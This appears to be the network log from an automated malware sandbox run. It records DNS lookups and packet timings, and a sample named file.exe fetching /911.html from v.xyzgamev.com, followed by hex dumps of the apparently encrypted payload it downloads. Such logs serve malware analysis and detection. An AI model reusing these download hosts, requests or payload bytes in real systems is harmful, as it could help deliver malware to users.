Sep 11, 2022 10:16:26.575048923 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575200081 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575566053 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.575582981 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575608969 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575733900 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.575797081 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575877905 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.575932026 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.576055050 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.576227903 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.576241970 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.576303959 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.591779947 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.591876984 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.591922045 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.591952085 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.591976881 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Sep 11, 2022 10:16:26.591989040 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.592015028 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.592036963 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.592715979 CEST | 49725 | 443 | 192.168.2.3 | 104.21.40.196
Sep 11, 2022 10:16:26.592745066 CEST | 443 | 49725 | 104.21.40.196 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2022 10:16:23.859339952 CEST | 57134 | 53 | 192.168.2.3 | 8.8.8.8
Sep 11, 2022 10:16:23.886456013 CEST | 53 | 57134 | 8.8.8.8 | 192.168.2.3
Sep 11, 2022 10:16:26.448995113 CEST | 62050 | 53 | 192.168.2.3 | 8.8.8.8
Sep 11, 2022 10:16:26.472578049 CEST | 53 | 62050 | 8.8.8.8 | 192.168.2.3
Sep 11, 2022 10:16:32.588133097 CEST | 56042 | 53 | 192.168.2.3 | 8.8.8.8
Sep 11, 2022 10:16:32.588891029 CEST | 59636 | 53 | 192.168.2.3 | 8.8.8.8
Sep 11, 2022 10:16:32.610487938 CEST | 53 | 59636 | 8.8.8.8 | 192.168.2.3
Sep 11, 2022 10:16:32.765250921 CEST | 53 | 56042 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 11, 2022 10:16:23.859339952 CEST | 192.168.2.3 | 8.8.8.8 | 0x51eb | Standard query (0) | v.xyzgamev.com | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:26.448995113 CEST | 192.168.2.3 | 8.8.8.8 | 0x91c | Standard query (0) | v.xyzgamev.com | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:32.588133097 CEST | 192.168.2.3 | 8.8.8.8 | 0xb664 | Standard query (0) | g.agametog.com | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:32.588891029 CEST | 192.168.2.3 | 8.8.8.8 | 0xfe29 | Standard query (0) | g.agametog.com | 28 | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 11, 2022 10:16:23.886456013 CEST | 8.8.8.8 | 192.168.2.3 | 0x51eb | No error (0) | v.xyzgamev.com |  | 172.67.188.70 | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:23.886456013 CEST | 8.8.8.8 | 192.168.2.3 | 0x51eb | No error (0) | v.xyzgamev.com |  | 104.21.40.196 | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:26.472578049 CEST | 8.8.8.8 | 192.168.2.3 | 0x91c | No error (0) | v.xyzgamev.com |  | 104.21.40.196 | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:26.472578049 CEST | 8.8.8.8 | 192.168.2.3 | 0x91c | No error (0) | v.xyzgamev.com |  | 172.67.188.70 | A (IP address) | IN (0x0001)
Sep 11, 2022 10:16:32.765250921 CEST | 8.8.8.8 | 192.168.2.3 | 0xb664 | No error (0) | g.agametog.com |  | 34.142.181.181 | A (IP address) | IN (0x0001)
• v.xyzgamev.com
• pp.abcgameabc.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 172.67.188.70 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:16:24 UTC | 0 | OUT | GET /911.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: v.xyzgamev.com
2022-09-11 08:16:24 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Sun, 11 Sep 2022 08:16:24 GMT
Content-Length: 571230
Connection: close
Last-Modified: Mon, 29 Aug 2022 04:55:04 GMT
ETag: "8b75e-5e75a112fbded"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v2ZIR6kCSH4Qg784br1UP52PsJF%2F0z7%2Blpknn17EHw61et6z9XiKnm64pGw0TCL%2FzTOh%2F49d5HnLFluZysqJ93RsisW80q4y3mF0zL%2F9iylywgFSojgNPBBhaXGoAYspFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 748ef6094dbfd178-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-09-11 08:16:24 UTC | 0 | IN | Data Raw: 50 2c cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
Data Ascii: P,Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
2022-09-11 08:16:24 UTC | 1 | IN | Data Raw: a7 6a f4 6f c2 af d8 ae 06 0d 6c 26 fc fa 25 f3 55 44 e3 2e 60 e8 02 c6 eb 26 eb e1 74 3e 22 96 36 67 fa de a7 6a 2c a2 d4 d1 e2 2f 57 3d 00 fa 35 a6 16 15 6e 14 f1 00 2e be 0a 11 58 0e cf 99 68 3e cb 9f 6b c7 c4 27 e8 96 2e c8 7c 2f 68 e1 a5 ec a7 6a 66 44 58 f3 53 ef d4 1f 60 26 2a e4 f4 c4 59 e7 d4 bc 0e 14 29 55 5d 62 63 5b fa 04 16 14 1b 15 27 28 86 89 6c e5 db af 2b f1 c5 bc 0a a9 62 17 69 d3 d6 db 8b f3 5b e7 d4 a6 c0 49 66 21 53 e7 d4 96 c0 72 2e a6 16 e8 ec dc 69 db da 96 2e 1d 14 51 5e 13 e4 ae 2a a6 16 91 16 d3 61 65 64 64 54 dd 60 95 27 95 d2 ee dd 9c 2a 13 5b e3 68 af da a4 1e 95 65 90 d9 c3 3f 3e 0c a4 1a d2 6e a6 1a a9 db 35 cd db ef b2 ec f7 f0 b7 2d ae 19 6a a7 a6 54 f5 a6 6f 77 04 1f f4 ef ac 12 19 6b 09 0e e3 eb 2d 1f d1 bb f1 6b 31 36
Data Ascii: jol&%UD.`&t>"6gj,/W=5n.Xh>k'.|/hjfDXS`&*Y)U]bc['(l+bi[If!Sr.i.Q^*aeddT`'*[he?>n5-jTowk-k16
2022-09-11 08:16:24 UTC | 2 | IN | Data Raw: 29 7b cb d8 b4 1a 01 1d 53 d2 db e0 2a 70 f5 2f ec e2 df 54 67 fb 36 e2 4c 14 c9 a0 6a 6b 82 f5 94 e4 d5 53 3d dc 53 cc 68 5a c2 0e 42 f5 2f 12 0c e7 6a a2 c3 8f d5 cf ea 27 6a f4 6f 0e c0 2e 85 54 41 4f 5a 54 ea bc 6e a6 bf c9 d2 39 1f fd 85 a4 32 35 fd a2 b7 c3 1b 6a 67 af 5c 91 62 ae 5c 7c 0b 58 1a a7 e8 42 43 ea 6d a1 2a df 56 af 05 41 a2 0a 8a a5 49 8d 61 a6 65 a9 6a 85 4c a3 6a a5 10 dc 1f 6f b7 c6 68 a7 7a 8a d7 37 3a 67 e3 2f ef 22 ee a2 63 ab 6f 24 6a 2b e0 21 69 47 8f a2 6a a5 79 56 8a a7 68 a5 2a e7 64 a9 7e 32 fe bc 64 22 ec a5 75 3c db 93 6a 3b ed b4 67 a2 3e 73 f8 b5 fa 32 6f a9 84 c6 e8 a3 60 29 ed 03 cf a2 fa 37 5c 91 6a 77 43 5a 6e 9f d1 a9 ea 22 e5 a8 98 59 6e e7 a3 21 fc be b9 bc 24 a8 6b 3c fc 98 70 87 41 83 a4 41 8c 5c d0 25 21 e7 43
Data Ascii: ){S*p/Tg6LjkS=ShZB/j'jo.TAOZTn925jg\b\|XBCm*VAIaejLjohz7:g/"co$j+!iGjyVh*d~2d"u<j;g>s2o`)7\jwCZn"Yn!$k<pAA\%!C
2022-09-11 08:16:24 UTC | 4 | IN | Data Raw: b6 4a 0c a4 0a bf 5a 2a 1d 25 e7 67 60 e3 f5 ae 16 1b 97 3a cb 30 f9 7a 60 80 a2 da 07 6e bc b5 75 f1 68 ce 59 c6 36 7b 68 e3 01 8b 97 78 54 85 e2 15 23 d8 1b 65 14 1d f3 ba 51 3c 13 71 8b eb f5 7f 92 7c 96 9f 55 0a c0 ed 52 85 62 6b ca 99 3c 71 c7 8b b6 8d cf 6b 7a 21 90 21 13 1a c2 5e 76 90 fc b0 69 3f d7 4d 95 0b 9b c9 f5 74 52 51 69 7d 4a 57 a7 4a 04 d2 9c 1f d8 15 d1 79 b7 6a 22 19 25 ec de ac e6 de 1f b9 39 45 d5 8d b1 06 6b 23 a3 a1 25 fd 68 b6 8c 86 a2 e1 ed ff a0 fa 39 dc 4a 2a 92 31 8e 90 bf dd 75 10 2c 57 11 e6 d5 3b e7 6e e3 35 1f 9e fc 1a 49 ec a7 4b 16 df d5 c2 2d 13 9b 74 c9 7a 7c a2 ec 9d 88 ba ab 7a b3 e9 69 3b f3 3b a3 f4 61 37 d3 87 28 ce 0b ed 17 33 f4 28 dc 70 17 ca f0 d5 3f 5e c2 57 bf d8 1a b3 65 eb 75 43 cd da 0c d1 a7 db 46 99 b4
Data Ascii: JZ*%g`:0z`nuhY6{hxT#eQ<q|URbk<qkz!!^vi?MtRQi}JWJyj"%9Ek#%h9J*1u,W;n5IK-tz|zi;;a7(3(p?^WeuCF
2022-09-11 08:16:24 UTC | 5 | IN | Data Raw: aa 28 19 5f 53 cb 33 a4 e3 fa b1 a7 6a a7 e1 e3 8e 7b 17 29 60 a9 e7 63 22 92 d6 6d a0 6e 2b 58 ae c9 33 d9 f7 a1 42 67 6b be cb cc f4 88 18 40 76 4c ab 9c 96 2a 23 e6 2b 69 66 66 43 50 76 66 ab 67 f9 d7 c3 6b 23 43 db fe 22 bc b2 2c 92 d2 a2 ee 30 a1 6d 18 82 f1 73 ea 68 24 2d 77 fb 32 ba 68 e1 aa 63 3c 26 18 76 d1 d5 9b 63 ab a8 24 3c bb 67 eb 70 18 f4 4a d7 8f ed 08 45 28 ca f6 0e a3 29 18 2e 86 c4 a9 74 54 aa 9e 16 ee 10 f7 cc 13 66 9f e2 6f 11 d9 23 d9 ee ba 83 bf 70 e5 78 7a a2 1e c6 a4 79 b1 d4 22 ff a0 6a d9 a9 0d 83 26 a8 6e 9c 26 1d 59 13 26 67 6a cb 21 01 61 e8 16 9e af e2 27 e9 e2 a6 6a e8 0e 07 22 e6 e8 e8 12 9b a5 81 b2 0c bc 95 d8 27 12 a1 46 b7 1e 9d da 56 2c ac 1a 12 2e 2a 6d a4 a2 c6 c2 ae 1a b1 44 a2 84 0d c3 80 e0 a6 e7 3b 77 ca 6f 57
Data Ascii: (_S3j{)`c"mn+X3Bgk@vL*#+iffCPvfgk#C",0msh$-w2hc<&vc$<gpJE().tTfo#pxzy"j&n&Y&gj!a'j"'FV,.*mD;woW
2022-09-11 08:16:24 UTC | 6 | IN | Data Raw: 2a e9 ff c5 09 f3 67 e9 ab 7c 3c ed b5 a4 f6 d8 14 4d 82 d0 1f da 1d ec a5 b4 f6 e3 63 11 6d 74 44 3a e9 75 02 cc a5 66 27 68 67 74 f6 5b 16 7b 33 86 4f 56 ae 0e f9 32 f5 06 5f 2a 57 20 cc 01 cd 02 4b 2e 18 25 d1 fb f5 2f 1e 34 b0 f2 5c 51 6f 1b 77 68 74 bb 16 0e 72 eb 5f f0 ce ea 53 a3 c0 9a 51 bd 2b e3 e2 d2 0b 35 2a dc 26 f7 63 22 e7 08 f4 3c b1 5b 86 aa 47 4a ae 9a 37 32 b2 4e 95 90 eb 2f e7 b5 f7 fc ff f5 72 20 77 3a eb 43 90 2f a0 7f d2 5b 2c 10 a9 80 5f 76 19 ac dc 8e f1 26 93 c7 33 1e d2 7b ab 3f 6f 82 47 32 6a 1f 43 a6 e7 00 2d 8a 58 80 9a 06 c3 18 b7 31 be 69 86 4f 12 f6 d7 f7 ef f4 b6 7f e6 55 5b ba cc 5e 0e dd 04 ca 8a 86 64 7e ad 44 a2 9c 35 24 4b 81 ed 89 0d 83 4b b0 67 ee 55 3d 21 cf ab 33 1f e0 f0 5e ba 7a af e5 4e 1e f2 63 bc c4 08 1e bf
Data Ascii: *g|<McmtD:uf'hgt[{3OV2_*W K.%/4\Qowhtr_SQ+5*&c"<[GJ72N/r w:C/[,_v&3{?oG2jC-X1iOU[^d~D5$KKgU=!3^zNc
2022-09-11 08:16:24 UTC | 8 | IN | Data Raw: 75 07 42 a8 e2 9b df a9 79 22 7b b3 f5 ab 51 1b 7e 36 2f 13 1e b4 29 1f 41 4a 46 a5 e9 bc 36 67 a9 62 4c 83 40 8d e1 2e 2c a3 a9 e4 ae f3 d2 a2 84 92 d5 2f 6e fe 7f 63 62 0e b9 a7 6a d8 2c 26 29 a3 3a 1f 69 4c 46 83 e9 a9 cb 83 65 c2 00 f7 b1 3c 72 50 c4 ee 75 ad 77 48 c7 f7 64 a8 64 27 b0 94 64 cc 39 f5 3a 7c d1 68 c3 d5 c5 e3 a1 4b d4 f0 5f 63 71 4e 5b 62 84 34 64 3e 76 9d 50 24 ef 2a e9 1f 8a 08 c4 fe 61 8a 4d a1 45 8c 7e b8 27 12 19 ea f3 a6 07 59 a7 fc d9 b0 b8 88 68 2c 04 62 17 38 a4 ab a6 6c 6d f1 b7 3c 8b dd 6f 91 d2 88 c0 eb d7 c3 35 63 77 f5 2f 22 bc 01 5b e2 e1 2d 39 a4 c4 08 4e 56 4f c7 d2 e5 db aa ed a9 0d cf 66 c1 42 67 bf d4 4e ad 45 81 63 29 8e 8b 3e 34 67 95 de a8 e7 2b 78 88 90 6e ef e2 f4 f6 fc ff 20 ed ab 64 9a 54 f4 3a fc 79 0d 4b 3c
Data Ascii: uBy"{Q~6/)AJF6gbL@.,/ncbj,&):iLFe<rPuwHdd'd9:|hK_cqN[b4d>vP$*aME~'Yh,b8lm<o5cw/"[-9NVOfBgNEc)>4g+xn dT:yK<
2022-09-11 08:16:24 UTC | 8 | IN | Data Raw: d2 a2 16 52 03 45 87 d1 fb e0 6d 21 69 db de b2 0a 52 2e 6f 8c 07 6d 6b 60 71 fb 13 ac af 5e 7a 58 ca e7 e1 61 2f 6c ce c2 7e 32 79 77 a1 69 d7 d2 b2 02 5a 00 05 22 2d 0a 88 a2 e4 e9 ba ba b2 0e 56 74 08 39 b6 ec 39 34 b3 ce c2 3d d0 09 a4 7f d9 69 d3 da e4 69 98 d1 6c 9c 18 ad 95 2d f7 b0 46 4f a6 24 b2 18 3f 21 a9 44 a8 07 ec 84 3a d0 4d c8 dd 2d 13 6b a0 c5 82 e6 e5 e9 e9 c5 b5 39 f0 bd 79 4f 34 e2 ea e2 87 40 fc fd 09 02 65 0e cc 02 b2 bf 26 ad 44 af 68 e0 57 9a d7 d7 e3 eb d3 12 4c ec 19 a6 bf ef f2 bd 5d d9 65 e6 5a 31 a1 ac 2a 90 b6 51 1f 24 e1 e9 20 98 a8 2d 42 77 e7 a1 51 5b da 85 14 74 2a b4 c1 0d 6a 27 b7 bf 44 9c 92 a5 e1 d6 51 89 9a bb 93 66 51 e9 2c da 17 fe b0 e2 4c 4d 71 7f 94 9e e1 26 19 55 e3 a5 a4 ef ec 61 a1 fa 0f 46 7f 21 29 b1 bf 2a
Data Ascii: REm!iR.omk`q^zXa/l~2ywiZ"-Vt994=iil-FO$?!D:M-k9yO4@e&DhWL]eZ1*Q$ -BwQ[t*j'DQfQ,LMq&UaF!)*
2022-09-11 08:16:24 UTC | 10 | IN | Data Raw: 7e 43 a9 37 6f fb a3 9b 99 68 5a a7 9e 63 b2 7f 34 e9 c1 d4 11 eb a2 73 b6 de 18 a3 e1 d4 79 6b c6 72 20 38 e9 64 70 9f d2 d1 e7 fa 7a 91 7b 8d bb 56 d6 c2 c1 ee 80 bc 7c 31 32 f2 db 82 05 d4 d0 c9 bb 26 9f fc c8 6d 2c f6 d2 fa 0f 6b 56 0c 29 e6 ae 06 32 3d af 78 5f a7 6d e4 27 26 a6 ea a4 24 6f 1b 94 e5 7a 1f 11 24 78 2c e5 e4 de 57 eb 27 6a 1f 6f 2d 5d 63 be 74 6d 61 e3 59 f7 be f4 08 84 dd 63 f6 36 a5 26 5b 9d b6 8e 52 7d ac 53 84 a2 08 fe 0f 39 ec 68 a4 bf cb f3 26 b0 0e 2d 6f ed c5 e4 70 e7 67 68 a7 ee b8 ca 60 6f a0 3d f5 5d 5d 22 68 61 0e 0f 28 e5 3e 04 cd f7 70 57 e4 48 2e 11 17 19 54 cc 48 e7 fd 0b aa 50 c9 0c 06 c3 56 96 7f 4b a4 90 90 78 b1 dd 17 5f a5 3c a7 d2 ec 6c 52 13 91 c6 03 2c f6 9a 40 cd 49 c4 19 73 7b 9f f9 5a 8c a8 51 e7 c4 4d ea b4
Data Ascii: ~C7ohZc4sykr 8dpz{V|12&m,kV)2=x_m'&$oz$x,W'jo-]ctmaYc6&[R}S9h&-opgh`o=]]"ha(>pWH.THPVKx_<lR,@Is{ZQM
2022-09-11 08:16:24 UTC | 11 | IN | Data Raw: 44 74 a5 e1 ec 4f 1f f5 61 6e 6b a1 a0 aa 10 0d e6 6d 7a 10 16 37 b5 d3 11 6b 66 cb b1 27 62 b1 06 8b fd 64 97 7a 5f d0 35 c9 c7 7c 4e fc 8c 2f b6 83 3c 0c 4e 99 bc 7f d8 81 a6 b1 aa 54 ff 66 9b 7a f6 29 ad 9d 4d db 83 c9 0d a5 c9 1c ac 7f f0 be a4 d2 f6 c3 28 4b 4d ae fb 35 6c a0 e4 36 ec 6b 7b 18 e4 d4 e2 ab 31 4f 5d 28 6b 29 62 84 7f 9d 45 87 38 3b 91 44 75 a9 e7 b3 1e 36 53 02 06 a4 d8 d0 23 cc 84 2d 67 5d 62 de a4 04 48 36 1a 0a fe 7d b7 31 e3 6a b9 1e cd 72 e8 55 3f da f2 fd 3b a7 ff ae c8 72 16 e7 12 9d 25 bc 8e a1 17 56 05 ef a3 6b 3a 63 5a de 68 ca 6b 82 c0 84 48 7c 1d 68 87 2c c9 eb 6b c3 8a db 96 27 22 a6 e2 9a 58 d2 51 3b e7 c5 4d f7 2f 2c e5 ef 12 5c cf 02 e5 2d 20 04 b6 80 4e d3 e6 7e b6 03 cf e1 f4 3b 73 d7 48 e1 e3 ef 62 e7 fd bd 6d e7 25
Data Ascii: DtOankmz7kf'bdz_5|N/<NTfz)M(KM5l6k{1O](k)bE8;Du6S#-g]bH6}1jrU?;r%Vk:cZhkH|h,k'"XQ;M/,\- N~;sHbm%
2022-09-11 08:16:24 UTC | 12 | IN | Data Raw: e7 bc fe a9 7b 32 5b 96 e2 6a 31 bc e5 a9 67 0e d8 34 62 24 64 ae 75 34 66 28 2d a4 bd 03 cf c2 47 96 73 dc 43 81 9e c6 a3 16 f2 4e d2 97 fb 05 f9 00 c6 14 6e 03 ca 25 33 52 1e f7 ea e0 be 48 95 d2 07 40 e0 c6 81 2d 0f 96 ce 37 45 60 68 a7 21 35 b3 ed ee 77 ae 7d 80 f6 ce 48 05 d5 fd 8d c4 06 cb 25 16 59 1d c2 f2 a9 ee b7 57 da 51 f2 02 7b a9 eb 2e b4 d1 f8 0b 8e 6a 28 40 f1 6d cc 08 80 4c 94 ea 17 e1 61 df 6d b1 fa a2 e8 4c f1 72 e8 c7 62 67 e5 a8 1c 34 5f 8e 5c a8 1f d3 c9 fd e3 b8 f8 69 2f 32 f9 95 d7 67 b7 77 25 eb 8a 20 4a e3 26 2b 67 68 c1 89 e2 df 27 b4 5a 31 2a 19 d6 b9 8c 1d 1e 08 c9 d2 28 11 dd 32 19 13 9d 20 48 60 a7 d7 1e 48 85 59 54 92 d8 8d 05 67 3d 3f 37 bb 26 6b 27 eb a6 3b 75 9d 2e 1d e2 f7 1c e8 c5 9e a4 6a 28 9b 22 e3 6f 27 2e 09 09 e0
Data Ascii: {2[j1g4b$du4f(-GsCNn%3RH@-7E`h!5w}H%YWQ{.j(@mLamLrbg4_\i/2gw% J&+gh'Z1*(2 H`HYTg=?7&k';u.j("o'.
2022-09-11 08:16:24 UTC | 14 | IN | Data Raw: c6 75 a3 6a 30 32 97 b3 7a 7e 09 d4 8f 42 a7 6a 2e 7e be 17 a1 6a 08 fd e8 a1 f0 7e a7 6a 2e 56 9e e6 bd 70 58 80 86 1a e7 7e 34 2d 53 56 26 62 b6 ff 9e 51 c2 5c 08 95 b2 37 ac 2d b3 f3 ab 67 2e 6b 81 cf dc 6d 2d 31 d8 b0 0c 01 e8 e3 af 7c 34 64 c3 3f 88 10 cc 3b 31 ae af 09 26 3f 1a a5 97 6a 07 6b a2 ba 61 07 7f a1 59 4f 01 27 05 09 61 6a a3 02 ce 05 a3 40 18 80 9e 67 86 2f 69 39 c0 d4 a6 05 0e af 24 83 c1 7a b8 e7 a4 14 57 f9 34 51 65 e5 c9 f3 e0 bc b3 2e e7 6a cd 42 b3 6f f1 e6 2e e3 2c 44 32 93 e7 c5 85 62 e2 aa cd 01 a6 45 ee 87 3c 1c fa 40 c3 1f b9 12 44 3d 01 0b d4 87 2c 3a f5 0e fa 00 f4 1d dd 25
Data Ascii: uj02z~Bj.~j~j.VpX~4-SV&bQ\7-g.km-1|4d?;1&?jkaYO'aj@g/i9$zW4Qe.jBo.,D2bE<@D=,:%
2022-09-11 08:16:25 UTC | 14 | IN | Data Raw: 64 29 63 ed e5 af a3 60 d8 1f 79 87 54 41 49 74 7c 29 a4 22 6e ee e2 a5 2c 4c 05 5e 87 c6 5b 2f 86 c7 2b 4b e1 9c 51 ac 8c f0 d0 37 8c fc 3e 24 76 f5 8a 08 76 f4 79 af a3 4b 0b f8 cc 78 43 62 af 6a 01 5e 3f e6 bc 76 e5 0b d7 7d 1f 80 f2 aa 6c ac 1e 4a f6 2d 25 c7 dc b8 29 ed 2e 71 28 aa 1f 42 f5 78 ef 27 92 da f3 26 bc 97 d2 63 83 4c 84 40 2a 71 b0 e9 a9 5b 93 e3 27 a7 fc 71 ab e9 a9 47 8c ed ab e9 a9 43 2a c8 20 62 28 2e 70 fe 96 20 ed ee 97 c4 f7 80 f6 ae 08 45 f9 b1 c2 ca 19 6b a7 c4 7d 6c 2b b9 1f 00 98 02 a3 b2 65 27 4b df fa a4 96 6a 0b b2 dc 65 4d 09 dd a6 6f a7 69 51 57 a8 e5 76 fe e9 f6 e3 f5 64 23 6c 7a 77 61 2f e7 e3 64 20 77 39 f1 b7 59 17 22 62 f6 49 f0 35 a7 c2 7b dc 1b 90 8a fe e1 ee f7 b3 a3 67 d2 60 a7 6a 32 d7 32 57 5c 6e 25 38 b4 20 ea
Data Ascii: d)c`yTAIt|)"n,L^[/+KQ7>$vvyKxCbj^?v}lJ-%).q(Bx'&cL@*q['qGC* b(.p Ek}l+e'KjeMoiQWvd#lzwa/d w9Y"bI5{g`j22W\n%8
2022-09-11 08:16:25 UTC | 15 | IN | Data Raw: 19 e5 0c 0a 76 ba 76 b2 3e a1 6b 13 d5 38 a3 e5 22 cf 76 12 a4 dc 02 3e e0 bc 3f 35 b8 2d 2a 3c d2 de 3b 7b 9f 80 16 15 6e 10 d8 26 c8 00 3f 47 2a 75 e7 e8 ce 77 b9 e5 23 ab aa 77 bb a6 fa 51 85 ab 53 bb ca c1 35 7c 1a 71 5a cf 65 b0 e3 7a 38 27 f8 3c c9 87 e1 e4 6a 44 80 ae 89 46 79 50 b4 5f 7f e0 5b 49 6a 0b 48 4c 7c 43 ac 1b 15 cb a9 84 28 76 3a 08 e3 e1 5e f5 d4 64 b1 52 ea 06 0d f4 6b 34 cc 8c e7 99 a6 d1 e1 62 23 46 03 65 31 3e b5 15 aa 31 d0 be 5e e8 0d ba 5f 37 0d 71 3e c6 72 ec 14 36 56 34 47 f8 c5 ed de bd 46 f9 6c d8 77 a1 54 93 ea 4f 89 2f 73 38 2e 13 54 e0 33 d1 1f 83 10 ca 3b 95 85 21 df 3c d5 a7 7e 5f 91 28 6d c7 00 99 3f f7 7f e8 38 9e 9d bd c5 8a 35 f7 e7 61 2d 43 78 5e 69 a7 f3 aa ff 59 4f 28 13 99 df 7e 10 36 de df 50 e8 e6 14 1f ed a3
Data Ascii: vv>k8"v>?5-*<;{n&?G*uw#wQS5|qZez8'<jDFyP_[IjHL|C(v:^dRk4b#Fe1>1^_7q>r6V4GFlwTO/s8.T3;!<~_(m?85a-Cx^iYO(~6P
2022-09-11 08:16:25 UTC | 17 | IN | Data Raw: eb a3 d2 19 2a 29 e4 31 9c 82 e4 a1 79 33 6c e8 1e 97 80 c9 22 aa 13 1c 2c eb 22 af eb 3a 76 26 6e 62 be 7b b2 80 58 6a 2c c1 ca d3 37 87 23 66 b9 2c a1 35 f9 6f 77 04 1f f5 6d 62 87 b5 2d f3 a3 32 14 27 83 00 07 a0 cd 82 04 a0 26 e7 e6 a2 2c f1 b3 44 8f e3 79 2f 3e 18 2d 13 8b b5 2d 17 47 be 9a 44 78 13 0c 3d d7 2f 6a a9 e1 62 9a 6f 58 e9 a2 3b b6 5c 57 ec f2 7a a0 6e a3 e9 24 6d a9 e3 5d 07 bb 10 d1 2e 6c e0 4d 83 2e 20 67 fa 26 7a cd ff 0a c7 2d 0f 5f 13 9e 1a 80 6a 5d 37 39 a3 f1 3f ab 33 ce 56 43 7f a7 15 a5 e8 fc ab bf 67 28 31 32 af ae ea 80 4c ca 5a fb dc 00 7f 83 43 6b d3 5b 0a af be 1b d7 1a e3 bb db 7b 6d a7 1e d5 93 58 80 42 d8 e1 7e 3c fc ba 02 8c 2d b3 ff e2 df dd 6c ac 66 56 46 74 6f a6 5d 62 77 44 6c c1 9a bf ff e2 c5 4d 1f 7e d3 a8 ee dc
Data Ascii: *)1y3l",":v&nb{Xj,7#f,5owmb-2'&,Dy/>--GDx=/jboX;\Wzn$m].lM. g&z-_j]79?3VCg(12LZCk[{mXB~<-lfVFto]bwDlM~
